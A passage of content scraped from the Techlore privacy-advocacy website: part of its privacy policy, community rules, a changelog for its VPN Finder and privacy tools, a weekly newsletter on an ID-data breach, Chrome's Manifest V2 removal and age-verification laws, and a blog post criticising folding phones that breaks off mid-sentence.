we collect your email address to provide course access, track your progress, and issue certificates. You are welcome to use an aliased email address. Payment processing is handled by Stripe and is subject to their privacy policy unless you opt for cryptocurrency payment. Techlore, Inc. is the data controller for your course information; Podia acts as our processor. For members desiring more privacy, we offer Monero memberships which bypass the need for Stripe or any centralized payment provider. ## Affiliate Links Some links on our site are affiliate links, which may use cookies or tracking parameters to credit us for referrals. These are managed by third parties (like Amazon Associates or direct vendor programs). We have no control over their tracking practices. **However:** We always provide a standard non-affiliate link alongside any affiliate link, making affiliate links completely opt-in. We use privacy-respecting affiliate methods when possible, and we always disclose affiliate relationships. ## How We Use and Share Information We do not sell, trade, rent or share your Personal Information we collect with third parties. Period. Your data stays with us and only us. In rare scenarios, a third-party may be involved in handling your information to provide a Service (like Ghost for hosting or Stripe for payment processing). Generally, these third-parties will only collect, use and disclose your information to the extent necessary to allow them to perform the required services. We always attempt to offer safer alternatives to users when available. It's important to mention certain third-party service providers, such as payment processors, have their own privacy policies we have no control over. We recommend you read their privacy policies so that you can understand the manner in which your Personal Information will be handled by such providers. If you're concerned about sharing information with these services, remember you can use aliased email addresses and privacy-focused payment methods where supported: Ghost Privacy Policy: Stripe Privacy Policy: Podia Privacy Policy: In regard to how your information is used, the answer is simply to perform the Service you require. We don't have anything to gain from your data. We use Cloudflare for infrastructure and security across most of our sites. Cloudflare Privacy Policy: ## How We Protect Information We implement strong precautions to protect your Personal Information to the best of our ability. While we cannot guarantee your information will not be accessed, disclosed, altered or destroyed by a breach of such precautions, we take industry-standard security measures to prevent unauthorized access. By using our Service, you acknowledge that you understand and agree to this risk. ## Links to Other Websites As part of our Service, we may provide links to other websites or applications. We are not responsible for the privacy practices employed by those websites or the information or content they contain. We are doing our best to educate users and make improvements where we can to offer the best privacy - but we aren't perfect and neither are our selections. We encourage our users to read the privacy statements of other websites before proceeding to use them. If you dislike a site we reference or utilize - don't use it. ## Your Rights: Email Communications & Opting Out Based upon the Personal Information that you provide us, we may communicate with you in response to your inquiries to provide the services you request. We will communicate with you by email in accordance with your wishes. If you would like to opt out of communications and/or have all data we hold tied to you deleted, send a request to contact@techlore.tech. We will process your request promptly. ## Changes to Our Privacy Policy We reserve the right to change this Privacy Policy at any time. If we change this Privacy Policy, we will post these changes on this page so that you are always aware of what information we collect, how we use it, and under what circumstances we disclose it. It is your sole responsibility to check this website to view any such changes to the terms of this Privacy Policy. If you do not agree to any changes, if and when such changes may be made to this Privacy Policy, you must cease access to this website. ## Contact Us & Withdrawing Consent If you have any questions regarding this Privacy Policy or the practices of this Site, please contact us by sending an email to contact@techlore.tech --- Last Updated: This Privacy Policy was last updated on Wed Sep 2, 2026. ### Welcome Bronze Techlorian 👋 URL: https://techlore.tech/welcome-bronze-techlorian/ Last updated: 2026-02-13T23:44:20.000Z You're now a Bronze Techlorian—thank you for supporting independent digital rights advocacy! _This page is for subscribers on the Bronze Techlorian tier only._ ### Welcome Silver Techlorian 👋 URL: https://techlore.tech/welcome-silver-techlorian/ Last updated: 2026-02-13T23:44:11.000Z You're now a Silver Techlorian—thank you for supporting independent digital rights advocacy! _This page is for subscribers on the Silver Techlorian tier only._ ### Welcome Gold Techlorian 👋 URL: https://techlore.tech/welcome-gold-techlorian/ Last updated: 2026-02-13T23:44:03.000Z You're now a Gold Techlorian—thank you for supporting independent digital rights advocacy! _This page is for subscribers on the Gold Techlorian tier only._ ### Welcome Diamond Techlorian 👋 URL: https://techlore.tech/welcome-diamond-techlorian/ Last updated: 2026-02-13T23:43:57.000Z You're now a Diamond Techlorian—thank you for supporting independent digital rights advocacy! _This page is for subscribers on the Diamond Techlorian tier only._ ### Techlore Community Rules URL: https://techlore.tech/community-rules/ Last updated: 2025-12-09T08:33:16.000Z # Rules 📕 1. Every platform has its own guidelines you must follow. Ensure you are following the terms of service for every platform you join. 2. **Create an environment where people aren’t afraid to speak and ask questions.** This means: No flaming, personal bashing, excessive trolling, out of control arguments, insults, and similar behavior. If something gets out of hand, ping an admin/mod and let them handle it. 3. **Everyone deserves equal treatment and equal respect. No gatekeeping!** Everyone is joining from different stages in their tech journey, so instead of disrespecting others, share ideas and information with them to help them grow. 4. To incorporate all ages and demographics, **NSFW topics and content are strictly not allowed.** This includes – but is not limited to – videos or images depicting sexual actions, whether real or illustrated; verbal descriptions of sexual acts; and any other discussions related to these topics. 5. **Discriminatory jokes and hate speech are not allowed.** Hate speech is an attack on an individual or group based on their race, ethnicity, national origin, sex, gender, sexual orientation, religious affiliation, or disabilities. 6. **All illegal content is strictly prohibited.** This includes (but is not limited to) illegal licenses or key generators, ‘cracked’ software, illegal media content, personal threats, and other such topics and behavior. It is of the utmost importance that the security and privacy community is completely disassociated with illegal activities. 7. **Respect all moderator decisions.** If you have an issue with a moderator decision, please submit a report with as many details as possible to [our contact page](https://techlore.tech/contact). Do not argue with the moderator either in chat or in direct messages, nor make any attempts to circumvent any actions they have taken. Not respecting this policy may result in an immediate ban. 8. **Community bans apply across all Techlore communities and accounts.** Do not attempt to circumvent bans by joining other Techlore-operated platforms. Doing so will result in a permanent ban extension. --- # Additional Community Guidelines 📗 These aren’t strict ‘rules’ but general guidelines we expect you to follow when chatting in Techlore communities. We expect all our community members to act in good faith, and if you continually disregard our guidelines you may lose certain privileges in our community. **Continually violating these guidelines may result in formal warns or bans!** 1. We expect members to follow a [Burden of Proof](https://en.wikipedia.org/wiki/Burden%5Fof%5Fproof%5F%28law%29) model, where it’s the sole responsibility of the person making a claim to supply evidence of the claim. *Ex. If you claim something is untrusted, you have to supply your reasoning & evidence for why you believe it to be untrusted.* This allows community members to understand your reasoning and make educated assessments on the evidence provided, as well as engage in an open dialogue. Don’t expect others to do all this research, and don’t continually argue or disagree if you are unwilling to do so. It’s not others’ job to disprove you. It’s your job to provide evidence and proof. 2. Avoid discussing controversial or offensive topics. While occasionally warranted, oftentimes topics like politics or religion distract from our goals of education, and those topics may be better served elsewhere. More offensive topics including acts of violence, suicide/self-harm, or school shootings are always off-topic and should be avoided. Hate speech including racist, homophobic, sexist, or ableist slurs are always strictly prohibited pursuant to our rules above. 3. Please avoid avatar/profile names that may confuse you with a moderator, admin, or another user. If we notice community members are confused by your profile choices, we’ll ask you to make necessary changes. 4. We ask people to disclose conflicts of interest in relevant discussions. For example, if you develop a messenger and enter a discussion about another messenger, we ask you to clearly disclose your conflict of interest to the community for transparency. We also discourage our platforms being used by services to critique a direct competitor. For example, if you manage a VPN service, it is discouraged for you to open a thread criticizing another VPN provider. We want to avoid our platform being abused by services for self-gain, and we feel these criticisms should come from the community—not a direct competitor. If a service wants to criticize a competitor, it can always be done away from our platform. ### Welcome Techlorian 👋 URL: https://techlore.tech/techlorian/ Last updated: 2026-04-15T21:47:26.000Z You're now a Techlorian—thank you for supporting independent digital rights advocacy! _This page is for paying subscribers only._ ### Community Content Ideas URL: https://techlore.tech/community-content-ideas/ Last updated: 2026-04-13T16:09:45.000Z **How to participate:** All [Techlorians](https://techlore.tech/support/) when they join receive a link to submit video ideas that we add to this webpage. Alternatively they can ping Henry in the Signal group to submit an idea. **Why is submission limited to members?** Techlore reaches hundreds of thousands monthly. Opening submissions to everyone would create an unmanageable flood. By limiting to our members (who directly support our work), we can review every idea and maintain quality suggestions that shape our roadmap. ## 🟢 In Progress --- ## 🟡 Under Review - **A guide to how to be digitally sovereign** *(Submitted by: Nyx)* - **Moving Away from Google in 2026** *(Submitted by: Anonymous Techlorian)* - **Privacy-respecting GPS navigation** *(Submitted by: Anonymous Techlorian)* --- ## ✅ Completed - **Cape Cellular Interview** *(Submitted by: Various Techlorians on Signal)* - **Organic Maps Interview** *(Submitted by: Anonymous Techlorian)* --- ## 🔴 Recently Dropped Coming soon, the list is new! ### SPA Tools Changelog URL: https://techlore.tech/changelog/ Last updated: 2026-09-06T17:05:50.000Z ### `v2026.09` *Released: Sep 06, 2026* Maybe it's macOS Golden Gate inspired. But this was a major spring clean to make sure things work smoother across the board. ## New Engine **New engine, same site.** Rebuilt on Eleventy, with the VPN Finder now framework‑free. Over 10,000 lines of code deleted, one fewer programming language, and every page came out pixel‑identical. ## **SPA Tools** - **Tools hub is 27% lighter**, and some icons were up to 4.5× larger than needed. Fixed. - **Added Redact.dev and The Markup's Blacklight tool, removed Mullvad DNS** (retiring). ## **VPN Finder** - **48% smaller download.** Nearly half the code, same features. - **Column headers stay frozen while you scroll.** 105 lines of JavaScript replaced by 3 lines of CSS, and a more usable VPN Chart! - **Mobile gets cards.** The chart was pretty difficult to navigate, even on larger mobile devices. So now on mobile users will see a new card UI to make navigation better. - **5 new providers** (DuckDuckGo VPN, Cloudflare WARP, HideIPVPN, Cypher VPN, StarVPN) and 6 corrected entries. Thank you to everyone who contributed data, and congrats to Obscura for their new Windows client! ## **SPA Quiz** - **Consistent scoring** no matter how you navigate, and saved links are now locked in by automated tests. Bookmark with confidence. ## **Faster everywhere** - **42% less CSS on every single page.** - **Zero text shift when fonts load.** Previously up to 30 pixels. - **Smoother scrolling and better battery life** from dropping the navbar blur, the site's biggest always‑on rendering cost. - **13 leftover files and 3 unused fonts** no longer shipped. ## **Accessibility and dark mode** - **Skip‑to‑content on 100% of pages.** - **Screen readers announce filter changes and form errors.** - **Dark mode reaches scrollbars and dropdowns**, with no light flash on load. ## **Security** - **VPN submission form hardened** against hidden‑character tricks. --- ### `v2026.08` *Released: August 14, 2026* This release is a big one: 100+ new VPN pages, a smarter Quiz, a few new tools, and a faster site across the board. Here's what changed. ## 100+ New VPN Pages (and No JavaScript Required) Every VPN now has its own dedicated page, and 60 head-to-head comparisons exist between the most common pairs. Two reasons this matters: JavaScript-free and Tor users can now browse VPN data as plain static pages, and search engines/AI tools can finally index it properly instead of hitting a chart. Access them by clicking 'All 47 providers' or 'Head-to-head comparisons' on the VPN Finder. ## The Quiz Stops Repeating Itself If you told the Quiz you already use email aliasing, it could still turn around and recommend an aliasing service. Not exactly useful. That logic (and a couple of related cases) is fixed now. Also: a new "Report an Issue" button on the results screen sends your saved link straight to a feedback form. No more emailing me your link and a description by hand. Nothing is sent unless you click submit. ## Also in this release - Three new tools: Immich (self-hosted photos), DuckDuckGo Email Protection, and Trocador (no-KYC crypto exchange). - A round of community-sourced corrections across 10 VPN providers, plus one new VPN added (VPN Unlimited). - Meaningfully faster pages across all three tools - Accessibility fixes, including contrast and quiz keyboard/screen-reader conflicts. To get more info on the long list of changes in this release, I made a [dedicated blog ](https://techlore.tech/techlore-v2026-08-100-new-vpn-pages-a-smarter-quiz-and-a-faster-site/)walking you through all of it. **A heads up:** v2026.09 may be late or skipped. I'm freezing new features for a migration. Nothing you'll see or notice, but it needs a focused push. More on that soon. --- ### `v2026.07` *Released: July 20, 2026* **This release is simple: the SPA tools work for more people.** Here's what changed. ## Now it works for everyone (Yay Accessibility!) If you navigate the web with a keyboard or a screen reader, the VPN Finder's comparison tool was previously quite tricky to navigate...it had no way to pick VPNs, sort the table, or open a comparison at all for these individuals. So I'm happy to say it was rebuilt with accessibility in mind 🙏 The whole VPN Finder and the SPA site's menus should work fully by keyboard and screen reader. If any ways to improve further are found, just let us know! ## The wiki has a new home The Techlore Wiki is now part of the main site, under **Guides** at [techlore.tech/tag/guides](https://techlore.tech/tag/guides/). Every article came with it, every old link redirects on its own, and there's nothing you need to do. I understand the Wiki was a brand new launch, but it wasn't getting found on its own. Many of you were arriving from our other tools, not through search. So I decided the best move to keep it easy to maintain was to migrate them back to a hosted service (Ghost) and avoid unnecessary complexity on the hosting side of things. ## Also in this release - **7 new VPNs** and dozens of community-sourced corrections in the VPN Finder, plus a new "Browser Extension" column with clearer ownership info. Thank you to all the contributors who submitted data, especially: **Sebastian, Ali, Nik, Jacopo** - **A new Cellular Providers category** in the Tools hub. - **Smarter quiz results** that drop you straight into the recommendations that fit you. - **A stack of security, reliability, and accessibility fixes** under the hood. #### Full List of Changes ****Content & structure** - Wiki retired. All articles migrated to Ghost under the ****Guides** tag - 49 community submissions applied to VPN Finder: 7 new VPNs (PrivateVPN, CactusVPN, Xeovo, PrivadoVPN, OysterVPN, MEGA VPN, Bitdefender VPN). - New VPN data fields in VPN Finder: `browser_extension`, optional diskless/warrant-canary notes. - VPN Finder: "History" column renamed ****"Ownership,"** relationship data refreshed from Windscribe's VPN Relationship Map (credited, unaffiliated). - New ****Cellular Providers** category (Cape, Phreeli, Silent Link, PikaSim) in the SPA Tools - Quiz results pre-filter the Tools hub by the user's archetype. - Copy refresh across Quiz, Tools, and VPN Finder. ****Accessibility** - VPN Finder made fully keyboard/screen-reader operable: row selection, sortable headers, focus management in both modals. - Site navigation made keyboard-operable (mobile menu + desktop dropdowns). ****SEO / crawlers** - Static server-rendered VPN table so non-JS crawlers and AI tools see the data. - Fixed structured-data / Open Graph URLs pointing at the wrong host ****Security & data integrity** - Submission security enhancements - Stricter requirements around what constitutes a 'submission' when submitting data ****Internal** - VPN field metadata consolidated into a single registry to make future maintenance easier - Dead code & nav cleanup and other quality of life improvements! --- ### `v2026.06` *Released: June 01, 2026* ## Your Privacy Journey Made Easy *Four tools. One path. From "I don't know where to start" to a setup that's genuinely yours.* You finally decided you're finally going to take this seriously. You open a search, and within minutes you're buried...twenty browser tabs, a dozen threads contradicting each other, a "top VPN" list that turns out to be a storefront, and a slow, sinking feeling that everyone else already figured this out and you're hopelessly behind. So you close the tabs. Maybe next month. At least that's how I felt when I started on the journey, so I wanted to change it! I built the SPA Ecosystem to make sure there is no next month, because the path starts right now with no friction. Four tools, designed to hand you from one to the next. Here's what each one does for you. ### SPA Quiz: Stop Guessing What You Need *"It depends on your threat model." -* The SPA Quiz helps you answer this age-old riddle. You answer questions about your actual life and it give you an **archetype**: a clear picture of what matters most for someone like you. Then it scores your current habits against that profile, so you can see exactly where you're solid and where the gaps are. And the result is a private link that's yours to keep. Bookmark it, act on it, and come back to watch your score climb as your setup gets stronger. Your privacy stops being a vague anxiety and becomes something you can actually see, measure, and improve. **Access the SPA Quiz**: [quiz.techlore.tech](https://quiz.techlore.tech/) ### SPA Tools: Find What You Need in a Few Clicks Knowing what you need is half the battle. Finding it is the other half. SPA Tools just got dramatically more capable. We've added a wave of new services and providers across every category, and built an entirely new filtering system on top of them. Dial in what matters to you and **filter by your quiz archetype**, so the tools that fit your life rise straight to the top. No more endless scrolling. No more forty open tabs. A few clicks, and you're looking at precisely the browsers, messengers, password managers, and operating systems that make sense for *you*. **Access the SPA Tools**: [tools.techlore.tech](https://tools.techlore.tech/) ### SPA Wiki: Understand the Why Launching today with nearly **four hours of original, written content**, the Wiki explains the concepts beneath every recommendation...what a threat model really is, why metadata matters, how encryption actually protects you, all in plain language that respects your intelligence without assuming you have a degree in security. And it has a *lot* of practical, personal commentary from yours truly (Henry 👋) And this is just the beginning. The Wiki is built to grow, with new articles landing regularly from here. **Access the SPA Wiki:** [**wiki.techlore.tech**](https://wiki.techlore.tech) ### VPN Finder: The Most Powerful VPN Comparison on the Internet The VPN market runs on noise. We're trying to build the antidote. VPN Finder lets you put **up to four providers head-to-head at once** on desktop and weigh what actually matters, like jurisdiction, audit history, logging, real technical specs. All side by side, in a single glance, with none of the marketing in the way. But this release includes something massive: you can now **submit and update provider data directly on the site.** No GitHub. No pull requests. No technical barrier of any kind. You all in the community that keep this comparison rigorous can now contribute in seconds, which means the most detailed, current VPN comparison anywhere only gets stronger from here...thanks to each and every one of you who helped get it this far! **Access the VPN Finder**: [vpn.techlore.tech](https://vpn.techlore.tech/) ### Four tools, One Journey Here's how it all comes together: Take the **Quiz** to discover your archetype. Carry it into **SPA Tools**, where that same archetype filters the best tools for you. Weighing VPNs? The **VPN Finder** puts your top contenders side by side until the right choice is obvious. And any time you want to understand *why,* the **Wiki** is right there waiting. Each tool makes the next one smarter. Together, they turn the most overwhelming parts of digital rights into a unified ecosystem. ### Home Hero URL: https://techlore.tech/home-hero/ Last updated: 2026-07-18T18:49:10.000Z ## Own your digital life. Someone's been making decisions about your digital life. It's time you made them instead. ### Homepage Story URL: https://techlore.tech/homepage-story/ Last updated: 2026-07-18T19:55:07.000Z Where to start Join tens of millions who've already taken back control. [ ↗ 1 See it Take the SPA Quiz ](https://quiz.techlore.tech) [ ↗ 2 Close the gaps Find SPA Tools ](https://tools.techlore.tech) [ ↗ 3 Level up Take Go Incognito ](https://techlore.tech/go-incognito-course/) [ ↗ 4 Stay ahead Surveillance Report ](https://techlore.tech/#/portal/signup) For over a decade, Henry's work has appeared in [**CyberNews** UK VPN bans](https://cybernews.com/privacy/uk-vpn-ban-why-democracies-cant-police-vpns/) [**CyberNews** Location privacy](https://cybernews.com/security/social-media-privacy-location-settings/) [**Decrypt** Multi-sig](https://decrypt.co/resources/what-is-a-multi-sig-wallet-a-beginners-guide) [**TechTimes** Brave Origin](https://www.techtimes.com/articles/317922/20260606/brave-origin-browser-launches-60-compile-out-build-removes-leo-tor-wallet.htm) [**Bitcoin Magazine** Silent Payments](https://bitcoinmagazine.com/technical/bitcoins-privacy-just-got-better-with-silent-payments) [**HuffPost** VPNs & privacy](https://www.huffpost.com/entry/proton-vpn-digital-privacy-experts%5Fl%5F68cab492e4b0635bf8b6498e) ![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2026/07/henry-cover-1.jpeg) ## Meet Henry Fisher I used to be all-in on big tech. Then I went all the way the other direction: under 30 accounts, a nearly 100% open-source stack, no phone at all. Having lived on both ends, I learned what's worth doing and what isn't. ****That's what I've spent over a decade doing: Techlore hosts videos, podcasts, courses, and free tools that put you back in the driver's seat of your digital life—without turning it into a second job.** ## Posts ### The ULTIMATE Proton Hardening Guide (Part 2) URL: https://techlore.tech/the-ultimate-proton-hardening-guide-part-2/ Last updated: 2026-09-05T15:38:37.000Z Part 1 covered Proton Mail and your Proton account. This video covers the rest of the Proton suite: what to enable, what to ignore, and why. [**Watch on Techlore.TV for an ad-free, surveillance-free viewing experience**](https://techlore.tv) ### 153 Million Driver's Licenses For Sale, Plus Chrome Kills uBlock Origin & Texas Kicks Out Flock URL: https://techlore.tech/153-million-drivers-licenses-for-sale-plus-chrome-kills-ublock-origin-texas-kicks-out-flock/ Last updated: 2026-09-05T03:44:14.000Z 📰 Listen to the weekly podcast on [Apple Podcasts](https://podcasts.apple.com/us/podcast/techlore-surveillance-report/id1507714387), [Spotify](https://open.spotify.com/show/5rxm041iDXxe0rINwO5G0c), other [podcast apps](https://pod.link/1507714387), or [RSS](https://feeds.transistor.fm/techlore-surveillance-report). You can also watch Surveillance Report on [YouTube](https://youtube.com/playlist?list=PL3KeV6Ui%5F4CZemCIsHUIuEtugAmUxAYHS) or [Techlore.TV](https://techlore.tv/w/p/twkcDETcDauUXuaGNJnhZG) [Click For All Sources](#action-item-✅) --- ## On My Radar 🎯 **An ID Company Leaked 153 Million Licenses** Ars Technica's Dan Goodin rented a car and, within hours, found his own driver's license among more than 153 million for sale on a dark-web market called Nexus. The trail led back to IDScan.net, a company whose entire pitch is preventing ID fraud "at scale." The irony isn't lost on anyone, since it seems they've leaked the ID of nearly everyone they scanned. And it wasn't just licenses! - Nexus was selling IDs, travel cards, international driver's licenses, medical cards, common access cards, residence cards, and employment authorizations - It even included the infrared and ultraviolet spectra of the scans. For context: IDScan partners with Hertz, retailers, gun shops, financial institutions, dispensaries, and hospitality venues, so the blast radius is *enormous*. Nexus (the site selling the data) is down for now and the FBI is investigating, but the reality is cybercriminals probably have your license if you're in the US and used one of impacted services. There's a good chance *I'm* in this one given I've used Hertz several times. The silver lining to this story is it's *another* reminder against mandated ID uploads. While this breach itself wasn't due to the age verification laws, it's a healthy reminder of what happens when a centralized company is responsible for collecting such sensitive user data. And we've already seen this exact [ID breach in the past caused by age verification](https://www.theguardian.com/media/2025/oct/09/hack-age-verification-firm-discord-users-id-photos). So I'll be referencing this IDScan.net incident going forward as another example for why IDs should never be carelessly collected in any digital context. **What you can do:** Freeze your credit if you're in a region where that's supported. It's the single best defense against someone opening accounts in your name. Every time you're asked to upload an ID, ask whether it's actually necessary, and if you can't avoid it, use the least-invasive ID you can (ideally one without your home address; a legal private-mailbox address on your license is worth considering if the option exists). I can't recommend much beyond this unfortunately, but I'll be sure to update you all as this story develops—I'm following this one closely. --- ## Bits & Bytes 🤖 **\~ Story 1: Chrome Officially Kills uBlock Origin and AdGuard** Manifest V2 is dead in Google Chrome. Google formally removed uBlock Origin and AdGuard from the Chrome Web Store. MV3, Google's replacement, happens to make effective ad blocking harder. Brave still lets you re-enable these (search "Manifest" in settings), and anything Firefox-based still supports MV2. **My take:** The browser you use comes down to a simple question: who runs it, and what are they incentivized by? Nearly every big-tech browser dropped MV2\. Brave, Vivaldi, and Firefox didn't. I'll let you connect the dots on Google, an ad company, making ad blocking less effective. **\~ Story 2: California's Age-Verification Bill Carves Out Linux** After many distros threatened to pull out of California, the state amended its age-verification bill to exempt Linux and open-source operating systems and package managers. **The good news:** pressure worked from EFF, from distros, from developers, from people who called their reps. **The bad news:** it does nothing for iOS, macOS, Windows, or stock Android users, the two-tier internet keeps forming, and even though this version is self-reported (no ID upload), nothing stops a future amendment from adding one. EFF is separately urging Newsom to reject AB 1709, a sweeping social-media ban for under-16s. **My take:** I covered this extensively in a [dedicated recent video](https://techlore.tech/california-age-verification-the-good-bad-ugly/), but I'll keep it short here by reminding everyone that this was a *signed law* which originally *included* Linux, but because of public outcry we now have an amendment that completely *excludes* Linux. Take note of these stories as examples of how making your voice heard can work! I receive an obnoxious number of comments from doomers who've given up and want others to give up too—don't listen to them! **Stay optimistic and we can get stuff done.** **\~ Story 3: Florida and Texas Step Back From Flock** Florida's DOT says it will cease using license-plate readers across state highways, with 30 days to pull the cameras, and Texas is moving the same direction. The caveat: several towns have seen Flock cameras reactivated after officials cancelled contracts, and Flock wouldn't tell TechCrunch whether it'll let Florida and Texas remove theirs. **My take:** This is a massive win, and what I love most is that Florida's memo targets **license-plate readers** as a category, not just Flock. I'm holding a little optimism in reserve until the cameras actually come down, but this is a big step in the right direction, and it's been wonderful to see bipartisan support for something in these polarizing times. --- ## This Week on Techlore 📺 Things started with an exciting interview on Techlore Talks with Josh from All Things Secured, I'm sure many of you know of his channel 😀 I specifically discussed safety when traveling, and learned about his wild story being interrogated & deported from China. It's a must-listen! [Border Crossings, Burner Phones, and Surviving Interrogation in China with Josh Summers from All Things SecuredTechlore Talks brings you in-depth conversations with the experts at the forefront of digital rights, privacy and security.![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/tl-c5f1c508-872a-4db0-affc-fe94c5091cac.png)TechloreTori![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/20260829-JOSH-ATS-INTERVIEW-thumbnail-v1-f93e53c8-3ed4-4127-8936-41c87e32d980.jpg)](https://techlore.tech/border-crossings-burner-phones-and-surviving-interrogation-in-china-with-josh-summers-from-all-things-secured/) In light of Apple gearing up for their likely folding phone. I made a quick blog with my take on folding devices and how it's unfortunate they came at the cost of repairable & budget devices to get here: [Folding Phones Are the Worst Thing to Happen to SmartphonesFolding phones are the most fragile, least repairable, most expensive phones ever made.![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/tl-0c09a872-3830-4fd4-be4a-3be5cca4ca53.png)TechloreHenry Fisher![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/photo-1756487564693-5d5f4c196fd5-abff2010-ad45-4972-82fb-ec8adbcc2bb4.jpeg)](https://techlore.tech/folding-phones-are-the-worst-thing-to-happen-to-smartphones/) As I covered earlier, I made some coverage on California's age verification amendment which excludes Linux: [California Age Verification: The Good, Bad & UglyIn 2027, your operating system is going to ask how old you are. California’s age verification law (AB 1043) takes effect January 1st, and AB 1856 just carved Linux out of it. But the law still leaves many questions open, here’s the good, the bad, and the ugly.![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/tl-5fb9834d-5fd4-4c6e-9704-ad57057d68cf.png)TechloreHenry Fisher![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/Untitled4-82821856-dd74-4907-934c-d000186b5913.png)](https://techlore.tech/california-age-verification-the-good-bad-ugly/) --- ## Action Item ✅ Freeze your credit this week if you haven't. It's free, it's reversible, and it's the one move that blunts the worst outcome of breaches like the IDScan.net leak. While you're at it: if you use Mullvad's public encrypted DNS, they're shutting it down, so switch to another provider before **November 2**. I covered that story more in the podcast, and you can see the OG announcement [here](https://www.mullvad.net/en/blog/2026/9/3/shutting-down-our-public-encrypted-dns-servers-and-sponsoring-quad9-instead/). **Until next week 🫡** #### This Week's Sources ****Highlight: 153 Million Driver's Licenses For Sale, Breach Linked to IDScan.net, FBI Probing** - - ****Story 1: Chrome Kills Manifest V2 — uBlock Origin & AdGuard Removed from the Web Store** - ****Story 2: California Age-Verification Bill Passes With a Linux Exemption** - - - ****Story 3: Florida and Texas Step Back from Flock / ALPRs** - - ****The Defense Bulletin** **Data Breaches* - - - - - - - **Threats* - - - - - - - - **FOSS+ Updates* - - - - - - - - - - - - - - ### California Age Verification: The Good, Bad & Ugly URL: https://techlore.tech/california-age-verification-the-good-bad-ugly/ Last updated: 2026-09-02T00:23:43.000Z In 2027, your operating system is going to ask how old you are. California's age verification law (AB 1043) takes effect January 1st, and AB 1856 just carved Linux out of it. But the law still leaves many questions open, here's the good, the bad, and the ugly. [**Watch on Techlore.TV for an ad-free, surveillance-free viewing experience**](https://techlore.tv) ### Folding Phones Are the Worst Thing to Happen to Smartphones URL: https://techlore.tech/folding-phones-are-the-worst-thing-to-happen-to-smartphones/ Last updated: 2026-08-30T02:02:18.000Z It wasn't that long ago that you could buy a quality, midrange smartphone below the *$400* mark. The Google Pixel 4a started at *$349*, and in just 3 years the new starting price of the Pixel 7a was *$499*. Similarly, the iPhone SE was *$399* in 2020 and Apple completely killed the line in 2025, replacing it with the iPhone 16e which started at *$599*. The days when major manufacturers competed to deliver a high-quality budget phone are gone. That attention has moved to the opposite end of the lineup—premium folding phones. ### What Are Folding Phones ![person holding black android smartphone](https://images.unsplash.com/photo-1628744404730-5e143358539b?crop=entropy&cs=tinysrgb&fit=max&fm=jpg&ixid=M3wxMTc3M3wwfDF8c2VhcmNofDV8fGZvbGRpbmclMjBwaG9uZXxlbnwwfHx8fDE3ODgwNDY1OTl8MA&ixlib=rb-4.1.0&q=80&w=2000) Photo by [Onur Binay](https://unsplash.com/@onurbinay) / [Unsplash](https://unsplash.com/?utm%5Fsource=ghost&utm%5Fmedium=referral&utm%5Fcampaign=api-credit) For those unfamiliar, a folding phone looks like your typical smartphone at first glance, until it opens like a book, presenting a dual screen inside. This enables you to choose between a typical smartphone experience using only the outer screen, or opening it up for the more tablet-like experience. ### The Drawbacks The tech in these phones is impressive, and I'm not here to claim there are absolutely no use cases for them. But the downsides are very real: - **Dust & Sand will destroy the hinges.** No, seriously. Take one to the beach, get sand in the hinge, and it's [permanently fucked](https://youtu.be/rHCpgtc5nzs?t=252). Even the newer Pixel's IP68 claim [is questionable.](https://youtu.be/jUT3rUZGqLA?t=378) - **The inner screens are *extremely* fragile.** A [fingernail](https://youtu.be/jUT3rUZGqLA?t=109) will scratch them**.** - Not only are they the most fragile smartphones on the market, but they are **about as anti-repair as phones can get.** Heavy use of adhesive and complexity of the hardware make them a largely unrepairable device for the average person. - **The cost.** The Pixel 11 Pro Fold starts at *$1899*. The Galaxy Z Fold8 starts at *$1899*, with the Galaxy Z Fold8 Ultra starting at *$2,099*. The rumored Apple folding iPhone is expected to come in between *$1,999* and *$2,400*. Add it up: two to three times the price for a phone that breaks easier and can't be fixed. In any other product category that's an obvious downgrade and we'd charge less for it. ### So Who Are Folding Phones For? As someone who runs, lifts, sweats on my devices, takes my phone near sand, and shoots photo and video on it—I can't comprehend what the demographic for these phones is other than entertainment junkies watching Netflix on-the-go, or the top 1% of busy executives actually using the inner screens for niche workflows to optimize their time. And economically that's where things seem to point. Remember, people: The real cost of your hardware isn't just the sticker price. It's: `sticker price / length of time you own the hardware` **For example:** If you buy a Fairphone for *$600* and it lasts *5 years, t*hat's a *$10/month* smartphone. If you buy a *$1900* folding phone that only makes it *2 years* because you took it to the beach, it's about *$80/month*. For perspective on how insane these prices are: - **A Full Apple Ecosystem:** An **iPhone 17 Pro** ($1,099) + a **MacBook Neo** ($799) = **$1,898** - **A Second Apple Ecosystem Option:** A **regular base-model iPhone 17** \+ **base MacBook Air** \= **$1,798** - **The Ultimate Living Room Setup:** A **75-inch LG OLED 4K TV** ($1,200) + a **PlayStation 5 Pro** ($699) = **$1,899** - **Three Years of Coffee:** A daily **$1.75 drip coffee** from a local cafe every single day for **3 entire years** \= **$1,916** - **A MacBook Pro: $1,999** So who are these devices for? I've stopped believing that's the question being asked by the phone companies. They seem built to be the new flagship, the thing every other phone in the lineup gets priced against. You don't have to buy one to pay for it. The whole lineup moves up to meet it. ### The Hidden Cost Of Folding Phones Beyond just raw price, when I look at the folding trend, I see what's dying alongside it: - **Budget Phones.** As I discussed earlier, much of the attention from phone manufacturers has shifted from the low-end to the ultra-premium. Apple is a perfect example of this, literally killing their SE budget lineup while preparing to introduce an ultra-premium foldable one. - **Small Phones.** Apple gave up with the 13 Mini, Google gave up with the smaller 'a' series devices, and Asus gave up with the Zenfone. One argument I've seen for folding phones is that they're the next attempt at a "small" phone, since when it's not opened up it's a pocketable device that's easy to carry with good battery life. There's some legitimacy here, but it ultimately just proves it was *always* possible to build a small device with decent battery life. And now small phones are dead. - **Normalizing Ultra-Premium.** Remember when Apple decided to cross the $1k mark with the iPhone X in 2017? It was a controversy! How do you think people would've reacted in 2017 if someone told them that within two years Samsung would ship 